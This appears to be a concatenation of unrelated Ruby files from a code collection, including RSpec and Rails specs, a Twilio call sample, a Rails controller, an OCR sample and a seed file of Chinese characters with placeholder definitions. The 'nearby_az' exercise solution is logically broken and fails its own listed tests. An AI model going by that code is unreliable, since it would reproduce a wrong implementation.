# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
# This allows you to limit a spec run to individual examples or groups
# you care about by tagging them with `:focus` metadata. When nothing
# is tagged with `:focus`, all examples get run. RSpec also provides
# aliases for `it`, `describe`, and `context` that include `:focus`
# metadata: `fit`, `fdescribe` and `fcontext`, respectively.
config.filter_run_when_matching :focus
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = "doc"
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
end
| 49.313131 | 92 | 0.742933 |
6262b89470f63324d0845fed877db3af72e1ff3f | 532 | # Get twilio-ruby from twilio.com/docs/ruby/install
require 'twilio-ruby'
# Get your Account SID and Auth Token from twilio.com/console
# To set up environmental variables, see http://twil.io/secure
account_sid = ENV['TWILIO_ACCOUNT_SID']
auth_token = ENV['TWILIO_AUTH_TOKEN']
@client = Twilio::REST::Client.new(account_sid, auth_token)
call = @client.calls.create(url: 'http://demo.twilio.com/docs/voice.xml',
to: '+14108675310',
from: '+15005550006')
puts call.start_time
| 38 | 73 | 0.680451 |
33471eaaa2514eeaa211f88d41d9cb6a51af4615 | 2,203 | require 'rantly'
require 'rantly/rspec_extensions'
require 'rantly/shrinks'
require 'English'
PROGRAM = './circular_buffer'.freeze
FILE = 'circular_buffer.txt'.freeze
class Operation < Array
def operation
self[0]
end
def parameter
self[1]
end
def to_s
case self[0]
when :get
'get()'
when :put
"put(#{self[1]})"
when :length
'length()'
end
end
def inspect
to_s
end
end
class Rantly
def myTestData
Tuple.new [
Deflating.new(
array(integer % 8 + 1) do # series of operations with their parameters
Operation.new [
(choose :get, :put, :length),
integer % 65_536 # (parameters make sense only for :put)
]
end
),
integer % 10 # size of queue
]
end
end
RSpec.describe 'my circular buffer' do
it 'can do a series of operations' do
property_of { myTestData }.check do |test|
model = []
size = test[1]
`rm -f #{FILE}`
`#{PROGRAM} init #{size} 2>/dev/null`
if size.zero?
expect($CHILD_STATUS).to_not be_success
else
expect($CHILD_STATUS).to be_success
operations = test[0]
operations.each do |o|
case o.operation
when :get
value = `#{PROGRAM} get 2>/dev/null`
if model.empty?
expect($CHILD_STATUS).to_not be_success
else
expect($CHILD_STATUS).to be_success
value1 = value.to_i
value2 = model.shift
expect(value1).to be == value2
end
when :put
`#{PROGRAM} put #{o.parameter} 2>/dev/null`
if model.count >= size
expect($CHILD_STATUS).to_not be_success
else
expect($CHILD_STATUS).to be_success
model.push(o.parameter)
end
when :length
value = `#{PROGRAM} length 2>/dev/null`
expect($CHILD_STATUS).to be_success
value1 = value.to_i
value2 = model.count
expect(value1).to be == value2
end
end
end
end
end
end
| 22.479592 | 91 | 0.533364 |
188f0e623046ca983a73f17d2b35b31c2226cc68 | 1,093 | class Api::V1::Accounts::CustomFiltersController < Api::V1::Accounts::BaseController
before_action :fetch_custom_filters, except: [:create]
before_action :fetch_custom_filter, only: [:show, :update, :destroy]
DEFAULT_FILTER_TYPE = 'conversation'.freeze
def index; end
def show; end
def create
@custom_filter = current_user.custom_filters.create!(
permitted_payload.merge(account_id: Current.account.id)
)
end
def update
@custom_filter.update!(permitted_payload)
end
def destroy
@custom_filter.destroy!
head :no_content
end
private
def fetch_custom_filters
@custom_filters = current_user.custom_filters.where(
account_id: Current.account.id,
filter_type: permitted_params[:filter_type] || DEFAULT_FILTER_TYPE
)
end
def fetch_custom_filter
@custom_filter = @custom_filters.find(permitted_params[:id])
end
def permitted_payload
params.require(:custom_filter).permit(
:name,
:filter_type,
query: {}
)
end
def permitted_params
params.permit(:id, :filter_type)
end
end
| 21.86 | 84 | 0.717292 |
ff3d2c6ca3117a6519dd627e141ed0ad437a001c | 1,324 | module Asposeocrjava
module ReadPartInformationOfText
def initialize()
data_dir = File.dirname(File.dirname(File.dirname(File.dirname(__FILE__)))) + '/data/'
# Initialize an instance of OcrEngine
ocr_engine = Rjb::import('com.aspose.ocr.OcrEngine').new
# Set the Image property by loading the image from file path location
ocr_engine.setImage(Rjb::import('com.aspose.ocr.ImageStream').fromFile(data_dir + 'ocr.png'))
# Process the image
if ocr_engine.process()
# Display the recognized text
puts "Text: " + ocr_engine.getText().to_string
# Retrieve an array of recognized text by parts
text = ocr_engine.getText().getPartsInfo()
# Iterate over the text parts
i = 0
while i < text.length
symbol = text[i]
# Display part information
puts "isItalic : " + symbol.getItalic().to_s
puts "isUnderline : " + symbol.getUnderline().to_s
puts "isBold : " + symbol.getBold().to_s
puts "Text Color : " + symbol.getTextColor().to_string
puts "Quality : " + symbol.getCharactersQuality().to_s
i +=1
end
end
end
end
end
| 37.828571 | 101 | 0.573263 |
2885fba68b362c41801b4fc4eb9b2150e7c73d46 | 88 | def fib(n)
if n <= 1
n
else
fib(n - 1) + fib(n - 2)
end
end
fib(33) | 11 | 28 | 0.420455 |
1c33f5cc5bbbee81341638c884fbe16bb5009aab | 4,267 | require 'spec_helper'
describe "Properties", type: :feature, js: true do
stub_authorization!
before(:each) do
visit spree.admin_products_path
end
context "Property index" do
before do
create(:property, name: 'shirt size', presentation: 'size')
create(:property, name: 'shirt fit', presentation: 'fit')
click_link "Products"
click_link "Properties"
end
context "listing product properties" do
it "should list the existing product properties" do
within_row(1) do
expect(column_text(1)).to eq("shirt size")
expect(column_text(2)).to eq("size")
end
within_row(2) do
expect(column_text(1)).to eq("shirt fit")
expect(column_text(2)).to eq("fit")
end
end
end
context "searching properties" do
it 'should list properties matching search query' do
click_on "Filter"
fill_in "q_name_cont", with: "size"
click_on 'Search'
expect(page).to have_content("shirt size")
expect(page).not_to have_content("shirt fit")
end
end
end
context "creating a property" do
it "should allow an admin to create a new product property" do
click_link "Products"
click_link "Properties"
click_link "new_property_link"
within('.content-header') { expect(page).to have_content("New Property") }
fill_in "property_name", with: "color of band"
fill_in "property_presentation", with: "color"
click_button "Create"
expect(page).to have_content("successfully created!")
end
end
context "editing a property" do
before(:each) do
create(:property)
click_link "Products"
click_link "Properties"
within_row(1) { click_icon :edit }
end
it "should allow an admin to edit an existing product property" do
fill_in "property_name", with: "model 99"
click_button "Update"
expect(page).to have_content("successfully updated!")
expect(page).to have_content("model 99")
end
it "should show validation errors" do
fill_in "property_name", with: ""
click_button "Update"
expect(page).to have_content("Name can't be blank")
end
end
context "linking a property to a product" do
before do
create(:product)
visit spree.admin_products_path
click_icon :edit
click_link "Properties"
end
# Regression test for #2279
it "successfully create and then remove product property" do
fill_in_property
# Sometimes the page doesn't load before the all check is done
# lazily finding the element gives the page 10 seconds
expect(page).to have_css("tbody#product_properties tr:nth-child(2)")
expect(all("tbody#product_properties tr").count).to eq(2)
delete_product_property
check_property_row_count(1)
end
# Regression test for #4466
it "successfully remove and create a product property at the same time" do
fill_in_property
fill_in "product_product_properties_attributes_1_property_name", with: "New Property"
fill_in "product_product_properties_attributes_1_value", with: "New Value"
delete_product_property
# Give fadeOut time to complete
expect(page).not_to have_selector("#product_product_properties_attributes_0_property_name")
expect(page).not_to have_selector("#product_product_properties_attributes_0_value")
click_button "Update"
expect(page).not_to have_content("Product is not found")
check_property_row_count(2)
end
def fill_in_property
fill_in "product_product_properties_attributes_0_property_name", with: "A Property"
fill_in "product_product_properties_attributes_0_value", with: "A Value"
click_button "Update"
click_link "Properties"
end
def delete_product_property
accept_alert do
click_icon :delete
wait_for_ajax # delete action must finish before reloading
end
end
def check_property_row_count(expected_row_count)
click_link "Properties"
expect(page).to have_css("tbody#product_properties")
expect(all("tbody#product_properties tr").count).to eq(expected_row_count)
end
end
end
| 30.049296 | 97 | 0.682681 |
215cd121c2234c6d17e9aea6374f93907fb1437e | 1,019 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort('The Rails environment is running in production mode!') if Rails.env.production?
require 'rspec/core'
require 'spec_helper'
require 'rspec/rails'
require 'simplecov'
# save to CircleCI's artifacts directory if we're on CircleCI
if ENV['CIRCLE_ARTIFACTS']
dir = File.join(ENV['CIRCLE_ARTIFACTS'], 'coverage')
SimpleCov.coverage_dir(dir)
end
SimpleCov.start
ActiveRecord::Migration.maintain_test_schema!
WebMock.disable_net_connect!(allow_localhost: true)
RSpec.configure do |config|
config.include Devise::Test::ControllerHelpers, type: :controller
config.use_transactional_fixtures = true
config.infer_spec_type_from_file_location!
end
Shoulda::Matchers.configure do |config|
config.integrate do |with|
with.test_framework :rspec
with.library :rails
end
end
| 30.878788 | 86 | 0.782139 |
3902ce8f5e336f000f7890cbf631d65ea7b738b8 | 989 | # Write a method that takes a string in and returns true if the letter
# "z" appears within three letters **after** an "a". You may assume
# that the string contains only lowercase letters.
#
# Difficulty: medium.
def nearby_az(string)
for i in string.split('')
if i == "a" && string[i.to_i..3].include?('z')
return true
end
if i == 'z' && string[i.to_i..3].include?('a')
return false
end
end
return false
end
# These are tests to check that your code is working. After writing
# your solution, they should all print true.
puts('nearby_az("baz") == true: ' + (nearby_az('baz') == true).to_s)
puts('nearby_az("abz") == true: ' + (nearby_az('abz') == true).to_s)
puts('nearby_az("abcz") == true: ' + (nearby_az('abcz') == true).to_s)
puts('nearby_az("a") == false: ' + (nearby_az('a') == false).to_s)
puts('nearby_az("z") == false: ' + (nearby_az('z') == false).to_s)
puts('nearby_az("za") == false: ' + (nearby_az('za') == false).to_s)
| 34.103448 | 70 | 0.616785 |
acd8eee2ea747c6fa6e44434390583dcafe0c53d | 3,760 | module SimpleNavigation
module Renderer
describe Breadcrumbs do
let!(:navigation) { setup_navigation('nav_id', 'nav_class') }
let(:item) { nil }
let(:options) {{ level: :all }}
let(:output) { HTML::Document.new(raw_output).root }
let(:raw_output) { renderer.render(navigation) }
let(:renderer) { Breadcrumbs.new(options) }
before { select_an_item(navigation[item]) if item }
describe '#render' do
it "renders a 'div' tag for the navigation" do
expect(output).to have_css('div')
end
it "sets the right html id on the rendered 'div' tag" do
expect(output).to have_css('div#nav_id')
end
it "sets the right html classes on the rendered 'div' tag" do
expect(output).to have_css('div.nav_class')
end
context 'when no item is selected' do
it "doesn't render any 'a' tag in the 'div' tag" do
expect(output).not_to have_css('div a')
end
end
context 'when an item is selected' do
let(:item) { :invoices }
it "renders the selected 'a' tag" do
expect(output).to have_css('div a')
end
it "remders the 'a' tag without any html id" do
expect(output).not_to have_css('div a[id]')
end
it "renders the 'a' tag without any html class" do
expect(output).not_to have_css('div a[class]')
end
context 'and the :allow_classes_and_ids option is true' do
let(:options) {{ level: :all, allow_classes_and_ids: true }}
it "renders the 'a' tag with the selected class" do
expect(output).to have_css('div a.selected')
end
context "and the item hasn't any id explicitly set" do
it "renders the 'a' tag without any html id" do
expect(output).not_to have_css('div a[id]')
end
end
context 'and the item has an explicitly set id' do
let(:item) { :users }
it "renders the 'a' tag with an html id" do
expect(output).to have_css('div a#breadcrumb_users_link_id')
end
end
end
end
context 'and the :prefix option is set' do
let(:options) {{ prefix: 'You are here: ' }}
context 'and there are no items to render' do
let(:item) { nil }
it "doesn't render the prefix before the breadcrumbs" do
expect(raw_output).not_to match(/^<div.+>You are here: /)
end
end
context 'and there are items to render' do
let(:item) { :invoices }
it 'renders the prefix before the breadcrumbs' do
expect(raw_output).to match(/^<div.+>You are here: /)
end
end
end
context 'when a sub navigation item is selected' do
before do
allow(navigation[:invoices]).to receive_messages(selected?: true)
allow(navigation[:invoices].sub_navigation[:unpaid]).to \
receive_messages(selected?: true, selected_by_condition?: true)
end
it 'renders all items as links' do
expect(output).to have_css('div a', 2)
end
context 'when the :static_leaf option is true' do
let(:options) {{ level: :all, static_leaf: true }}
it 'renders the items as links' do
expect(output).to have_css('div a')
end
it 'renders the last item as simple text' do
expect(output).to have_css('div span')
end
end
end
end
end
end
end
| 31.596639 | 77 | 0.551596 |
03bfcec3cd7bceb772836c8a4fcd38af414a5d73 | 1,850 | require 'spec_helper'
module ChefSpec::Error
describe CommandNotStubbed do
let(:instance) { described_class.new(args: ['cat']) }
it 'raises an exception with the correct message' do
instance
expect { raise instance }.to raise_error { |error|
expect(error).to be_a(described_class)
expect(error.message).to eq <<-EOH.gsub(/^ {10}/, '')
Executing a real command is disabled. Unregistered command:
command("cat")
You can stub this command with:
stub_command("cat").and_return(...)
EOH
}
end
end
describe CookbookPathNotFound do
let(:instance) { described_class.new }
it 'raises an exception with the correct message' do
expect { raise instance }.to raise_error { |error|
expect(error).to be_a(described_class)
expect(error.message).to eq <<-EOH.gsub(/^ {10}/, '')
I could not find or infer a cookbook_path from your current working directory.
Please make sure you put your specs (tests) under a directory named 'spec' or
manually set the cookbook path in the RSpec configuration.
EOH
}
end
end
describe GemLoadError do
let(:instance) { described_class.new(gem: 'bacon', name: 'bacon') }
it 'raises an exception with the correct message' do
expect { raise instance }.to raise_error { |error|
expect(error).to be_a(described_class)
expect(error.message).to eq <<-EOH.gsub(/^ {10}/, '')
I could not load the 'bacon' gem! You must have the gem installed
on your local system before you can use the bacon plugin.
You can install bacon by running:
gem install bacon
or add bacon to your Gemfile and run the `bundle` command to install.
EOH
}
end
end
end
| 31.896552 | 88 | 0.630811 |
f72f02337cc788c49d971913a9221dfc10ee4e16 | 26,748 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
characters = [
{
id: 1,
pinyin: "ní",
simplified: "尼",
definition: "def",
created_at: "2018-10-28T06:58:31.321Z",
updated_at: "2018-10-28T06:58:31.321Z"
},
{
id: 2,
pinyin: "gēn",
simplified: "根",
definition: "def",
created_at: "2018-10-28T06:58:35.937Z",
updated_at: "2018-10-28T06:58:35.937Z"
},
{
id: 3,
pinyin: "zī",
simplified: "资",
definition: "def",
created_at: "2018-10-28T06:58:40.537Z",
updated_at: "2018-10-28T06:58:40.537Z"
},
{
id: 4,
pinyin: "lài",
simplified: "赖",
definition: "def",
created_at: "2018-10-28T06:58:43.171Z",
updated_at: "2018-10-28T06:58:43.171Z"
},
{
id: 5,
pinyin: "duó",
simplified: "夺",
definition: "def",
created_at: "2018-10-28T06:58:47.216Z",
updated_at: "2018-10-28T06:58:47.216Z"
},
{
id: 6,
pinyin: "lòu",
simplified: "漏",
definition: "def",
created_at: "2018-10-28T06:58:50.557Z",
updated_at: "2018-10-28T06:58:50.557Z"
},
{
id: 7,
pinyin: "xiù",
simplified: "绣",
definition: "def",
created_at: "2018-10-28T06:58:59.851Z",
updated_at: "2018-10-28T06:58:59.851Z"
},
{
id: 8,
pinyin: "wú",
simplified: "吴",
definition: "def",
created_at: "2018-10-28T06:59:08.296Z",
updated_at: "2018-10-28T06:59:08.296Z"
},
{
id: 9,
pinyin: "léng",
simplified: "棱",
definition: "def",
created_at: "2018-10-28T06:59:13.412Z",
updated_at: "2018-10-28T06:59:13.412Z"
},
{
id: 10,
pinyin: "chèn",
simplified: "趁",
definition: "def",
created_at: "2018-10-28T06:59:16.812Z",
updated_at: "2018-10-28T06:59:16.812Z"
},
{
id: 11,
pinyin: "hài",
simplified: "害",
definition: "def",
created_at: "2018-10-28T06:59:22.779Z",
updated_at: "2018-10-28T06:59:22.779Z"
},
{
id: 12,
pinyin: "lǒu",
simplified: "搂",
definition: "def",
created_at: "2018-10-28T06:59:26.389Z",
updated_at: "2018-10-28T06:59:26.389Z"
},
{
id: 13,
pinyin: "bēn",
simplified: "奔",
definition: "def",
created_at: "2018-10-28T06:59:30.681Z",
updated_at: "2018-10-28T06:59:30.681Z"
},
{
id: 14,
pinyin: "hé",
simplified: "和",
definition: "def",
created_at: "2018-10-28T07:01:41.138Z",
updated_at: "2018-10-28T07:01:41.138Z"
},
{
id: 15,
pinyin: "hén",
simplified: "痕",
definition: "def",
created_at: "2018-10-28T07:01:44.424Z",
updated_at: "2018-10-28T07:01:44.424Z"
},
{
id: 16,
pinyin: "dì",
simplified: "地",
definition: "def",
created_at: "2018-10-28T07:01:48.552Z",
updated_at: "2018-10-28T07:01:48.552Z"
},
{
id: 17,
pinyin: "dài",
simplified: "带",
definition: "def",
created_at: "2018-10-28T07:01:51.596Z",
updated_at: "2018-10-28T07:01:51.596Z"
},
{
id: 18,
pinyin: "dài",
simplified: "袋",
definition: "def",
created_at: "2018-10-28T07:01:52.963Z",
updated_at: "2018-10-28T07:01:52.963Z"
},
{
id: 19,
pinyin: "wù",
simplified: "物",
definition: "def",
created_at: "2018-10-28T07:02:01.672Z",
updated_at: "2018-10-28T07:02:01.672Z"
},
{
id: 20,
pinyin: "fèn",
simplified: "粪",
definition: "def",
created_at: "2018-10-28T07:02:07.240Z",
updated_at: "2018-10-28T07:02:07.240Z"
},
{
id: 21,
pinyin: "xiǎo",
simplified: "晓",
definition: "def",
created_at: "2018-10-28T07:02:12.091Z",
updated_at: "2018-10-28T07:02:12.091Z"
},
{
id: 22,
pinyin: "lì",
simplified: "立",
definition: "def",
created_at: "2018-10-28T07:02:15.727Z",
updated_at: "2018-10-28T07:02:15.727Z"
},
{
id: 23,
pinyin: "zǎi",
simplified: "宰",
definition: "def",
created_at: "2018-10-28T07:02:18.615Z",
updated_at: "2018-10-28T07:02:18.615Z"
},
{
id: 24,
pinyin: "zǎi",
simplified: "载",
definition: "def",
created_at: "2018-10-28T07:02:24.285Z",
updated_at: "2018-10-28T07:02:24.285Z"
},
{
id: 25,
pinyin: "luó",
simplified: "萝",
definition: "def",
created_at: "2018-10-28T07:03:37.988Z",
updated_at: "2018-10-28T07:03:37.988Z"
},
{
id: 26,
pinyin: "zèng",
simplified: "赠",
definition: "def",
created_at: "2018-10-28T07:03:41.852Z",
updated_at: "2018-10-28T07:03:41.852Z"
},
{
id: 27,
pinyin: "shāo",
simplified: "稍",
definition: "def",
created_at: "2018-10-28T07:03:45.366Z",
updated_at: "2018-10-28T07:03:45.366Z"
},
{
id: 28,
pinyin: "zhě",
simplified: "者",
definition: "def",
created_at: "2018-10-28T07:03:48.817Z",
updated_at: "2018-10-28T07:03:48.817Z"
},
{
id: 29,
pinyin: "wāi",
simplified: "歪",
definition: "def",
created_at: "2018-10-28T07:03:52.996Z",
updated_at: "2018-10-28T07:03:52.996Z"
},
{
id: 30,
pinyin: "fēng",
simplified: "峰",
definition: "def",
created_at: "2018-10-28T07:03:56.058Z",
updated_at: "2018-10-28T07:03:56.058Z"
},
{
id: 31,
pinyin: "pù",
simplified: "铺",
definition: "def",
created_at: "2018-10-28T07:03:58.982Z",
updated_at: "2018-10-28T07:03:58.982Z"
},
{
id: 32,
pinyin: "zá",
simplified: "砸",
definition: "def",
created_at: "2018-10-28T07:04:03.433Z",
updated_at: "2018-10-28T07:04:03.433Z"
},
{
id: 33,
pinyin: "luò",
simplified: "络",
definition: "def",
created_at: "2018-10-28T07:04:08.510Z",
updated_at: "2018-10-28T07:04:08.510Z"
},
{
id: 34,
pinyin: "fā",
simplified: "发",
definition: "def",
created_at: "2018-10-28T07:04:12.846Z",
updated_at: "2018-10-28T07:04:12.846Z"
},
{
id: 35,
pinyin: "shēn",
simplified: "深",
definition: "def",
created_at: "2018-10-28T07:04:21.523Z",
updated_at: "2018-10-28T07:04:21.523Z"
},
{
id: 36,
pinyin: "wǎ",
simplified: "瓦",
definition: "def",
created_at: "2018-10-28T07:04:25.386Z",
updated_at: "2018-10-28T07:04:25.386Z"
},
{
id: 37,
pinyin: "pā",
simplified: "趴",
definition: "def",
created_at: "2018-10-28T07:05:06.060Z",
updated_at: "2018-10-28T07:05:06.060Z"
},
{
id: 38,
pinyin: "gé",
simplified: "隔",
definition: "def",
created_at: "2018-10-28T07:05:08.661Z",
updated_at: "2018-10-28T07:05:08.661Z"
},
{
id: 39,
pinyin: "wěn",
simplified: "稳",
definition: "def",
created_at: "2018-10-28T07:05:15.048Z",
updated_at: "2018-10-28T07:05:15.048Z"
},
{
id: 40,
pinyin: "fá",
simplified: "乏",
definition: "def",
created_at: "2018-10-28T07:05:21.569Z",
updated_at: "2018-10-28T07:05:21.569Z"
},
{
id: 41,
pinyin: "fēi",
simplified: "飞",
definition: "def",
created_at: "2018-10-28T07:05:25.176Z",
updated_at: "2018-10-28T07:05:25.176Z"
},
{
id: 42,
pinyin: "péng",
simplified: "鹏",
definition: "def",
created_at: "2018-10-28T07:05:32.753Z",
updated_at: "2018-10-28T07:05:32.753Z"
},
{
id: 43,
pinyin: "gài",
simplified: "盖",
definition: "def",
created_at: "2018-10-28T07:05:36.437Z",
updated_at: "2018-10-28T07:05:36.437Z"
},
{
id: 44,
pinyin: "biàn",
simplified: "便",
definition: "def",
created_at: "2018-10-28T07:05:41.547Z",
updated_at: "2018-10-28T07:05:41.547Z"
},
{
id: 45,
pinyin: "zǐ",
simplified: "子",
definition: "def",
created_at: "2018-10-28T07:05:44.453Z",
updated_at: "2018-10-28T07:05:44.453Z"
},
{
id: 46,
pinyin: "jī",
simplified: "机",
definition: "def",
created_at: "2018-10-28T07:05:47.682Z",
updated_at: "2018-10-28T07:05:47.682Z"
},
{
id: 47,
pinyin: "gēng",
simplified: "耕",
definition: "def",
created_at: "2018-10-28T07:05:52.486Z",
updated_at: "2018-10-28T07:05:52.486Z"
},
{
id: 48,
pinyin: "wǎn",
simplified: "碗",
definition: "def",
created_at: "2018-10-28T07:05:56.198Z",
updated_at: "2018-10-28T07:05:56.198Z"
},
{
id: 49,
pinyin: "hào",
simplified: "浩",
definition: "def",
created_at: "2018-10-28T07:09:15.349Z",
updated_at: "2018-10-28T07:09:15.349Z"
},
{
id: 50,
pinyin: "háo",
simplified: "豪",
definition: "def",
created_at: "2018-10-28T07:09:16.099Z",
updated_at: "2018-10-28T07:09:16.099Z"
},
{
id: 51,
pinyin: "hěn",
simplified: "狠",
definition: "def",
created_at: "2018-10-28T07:09:20.050Z",
updated_at: "2018-10-28T07:09:20.050Z"
},
{
id: 52,
pinyin: "wǒ",
simplified: "我",
definition: "def",
created_at: "2018-10-28T07:09:24.208Z",
updated_at: "2018-10-28T07:09:24.208Z"
},
{
id: 53,
pinyin: "fēn",
simplified: "分",
definition: "def",
created_at: "2018-10-28T07:09:26.769Z",
updated_at: "2018-10-28T07:09:26.769Z"
},
{
id: 54,
pinyin: "zhòng",
simplified: "种",
definition: "def",
created_at: "2018-10-28T07:09:29.591Z",
updated_at: "2018-10-28T07:09:29.591Z"
},
{
id: 55,
pinyin: "zhōng",
simplified: "忠",
definition: "def",
created_at: "2018-10-28T07:09:31.087Z",
updated_at: "2018-10-28T07:09:31.087Z"
},
{
id: 56,
pinyin: "gǎi",
simplified: "改",
definition: "def",
created_at: "2018-10-28T07:09:34.665Z",
updated_at: "2018-10-28T07:09:34.665Z"
},
{
id: 57,
pinyin: "lù",
simplified: "陆",
definition: "def",
created_at: "2018-10-28T07:09:40.579Z",
updated_at: "2018-10-28T07:09:40.579Z"
},
{
id: 58,
pinyin: "láo",
simplified: "劳",
definition: "def",
created_at: "2018-10-28T07:09:46.399Z",
updated_at: "2018-10-28T07:09:46.399Z"
},
{
id: 59,
pinyin: "hé",
simplified: "何",
definition: "def",
created_at: "2018-10-28T07:09:52.047Z",
updated_at: "2018-10-28T07:09:52.047Z"
},
{
id: 60,
pinyin: "nǐ",
simplified: "你",
definition: "def",
created_at: "2018-10-28T12:09:28.008Z",
updated_at: "2018-10-28T12:09:28.008Z"
},
{
id: 61,
pinyin: "nì",
simplified: "逆",
definition: "def",
created_at: "2018-10-28T12:11:03.638Z",
updated_at: "2018-10-28T12:11:03.638Z"
},
{
id: 62,
pinyin: "wò",
simplified: "沃",
definition: "def",
created_at: "2018-10-28T12:11:06.389Z",
updated_at: "2018-10-28T12:11:06.389Z"
},
{
id: 63,
pinyin: "zhěng",
simplified: "整",
definition: "def",
created_at: "2018-10-28T12:11:10.071Z",
updated_at: "2018-10-28T12:11:10.071Z"
},
{
id: 64,
pinyin: "zhèng",
simplified: "症",
definition: "def",
created_at: "2018-10-28T12:11:13.115Z",
updated_at: "2018-10-28T12:11:13.115Z"
},
{
id: 65,
pinyin: "zhù",
simplified: "住",
definition: "def",
created_at: "2018-10-28T12:11:17.644Z",
updated_at: "2018-10-28T12:11:17.644Z"
},
{
id: 66,
pinyin: "tuī",
simplified: "推",
definition: "def",
created_at: "2018-10-28T12:11:25.149Z",
updated_at: "2018-10-28T12:11:25.149Z"
},
{
id: 67,
pinyin: "zǎo",
simplified: "枣",
definition: "def",
created_at: "2018-10-28T12:11:28.124Z",
updated_at: "2018-10-28T12:11:28.124Z"
},
{
id: 68,
pinyin: "shèng",
simplified: "圣",
definition: "def",
created_at: "2018-10-28T12:11:31.539Z",
updated_at: "2018-10-28T12:11:31.539Z"
},
{
id: 69,
pinyin: "xìng",
simplified: "性",
definition: "def",
created_at: "2018-10-28T12:11:36.916Z",
updated_at: "2018-10-28T12:11:36.916Z"
},
{
id: 70,
pinyin: "quán",
simplified: "泉",
definition: "def",
created_at: "2018-10-28T12:11:41.416Z",
updated_at: "2018-10-28T12:11:41.416Z"
},
{
id: 71,
pinyin: "nǐ",
simplified: "拟",
definition: "def",
created_at: "2018-10-28T13:11:49.179Z",
updated_at: "2018-10-28T13:11:49.179Z"
},
{
id: 72,
pinyin: "wā",
simplified: "挖",
definition: "def",
created_at: "2018-10-28T13:11:52.224Z",
updated_at: "2018-10-28T13:11:52.224Z"
},
{
id: 73,
pinyin: "zhào",
simplified: "照",
definition: "def",
created_at: "2018-10-28T13:11:55.618Z",
updated_at: "2018-10-28T13:11:55.618Z"
},
{
id: 74,
pinyin: "dǎo",
simplified: "导",
definition: "def",
created_at: "2018-10-28T13:11:58.249Z",
updated_at: "2018-10-28T13:11:58.249Z"
},
{
id: 75,
pinyin: "bǔ",
simplified: "捕",
definition: "def",
created_at: "2018-10-28T13:12:00.533Z",
updated_at: "2018-10-28T13:12:00.533Z"
},
{
id: 76,
pinyin: "zǐ",
simplified: "紫",
definition: "def",
created_at: "2018-10-28T13:12:02.908Z",
updated_at: "2018-10-28T13:12:02.908Z"
},
{
id: 77,
pinyin: "shí",
simplified: "时",
definition: "def",
created_at: "2018-10-28T13:12:05.404Z",
updated_at: "2018-10-28T13:12:05.404Z"
},
{
id: 78,
pinyin: "fěn",
simplified: "粉",
definition: "def",
created_at: "2018-10-28T13:12:07.932Z",
updated_at: "2018-10-28T13:12:07.932Z"
},
{
id: 79,
pinyin: "páo",
simplified: "刨",
definition: "def",
created_at: "2018-10-28T13:12:12.394Z",
updated_at: "2018-10-28T13:12:12.394Z"
},
{
id: 80,
pinyin: "pāo",
simplified: "抛",
definition: "def",
created_at: "2018-10-28T13:12:15.377Z",
updated_at: "2018-10-28T13:12:15.377Z"
},
{
id: 81,
pinyin: "pēn",
simplified: "喷",
definition: "def",
created_at: "2018-10-28T13:12:22.148Z",
updated_at: "2018-10-28T13:12:22.148Z"
},
{
id: 82,
pinyin: "wǔ",
simplified: "武",
definition: "def",
created_at: "2018-10-28T13:21:46.510Z",
updated_at: "2018-10-28T13:21:46.510Z"
},
{
id: 83,
pinyin: "pěng",
simplified: "捧",
definition: "def",
created_at: "2018-10-28T13:21:50.353Z",
updated_at: "2018-10-28T13:21:50.353Z"
},
{
id: 84,
pinyin: "zhī",
simplified: "只",
definition: "def",
created_at: "2018-10-28T13:21:53.677Z",
updated_at: "2018-10-28T13:21:53.677Z"
},
{
id: 85,
pinyin: "hǒu",
simplified: "吼",
definition: "def",
created_at: "2018-10-28T13:22:00.821Z",
updated_at: "2018-10-28T13:22:00.821Z"
},
{
id: 86,
pinyin: "huò",
simplified: "霍",
definition: "def",
created_at: "2018-10-28T13:22:06.421Z",
updated_at: "2018-10-28T13:22:06.421Z"
},
{
id: 87,
pinyin: "guō",
simplified: "郭",
definition: "def",
created_at: "2018-10-28T13:22:15.692Z",
updated_at: "2018-10-28T13:22:15.692Z"
},
{
id: 88,
pinyin: "gǎng",
simplified: "岗",
definition: "def",
created_at: "2018-10-28T13:22:20.763Z",
updated_at: "2018-10-28T13:22:20.763Z"
},
{
id: 89,
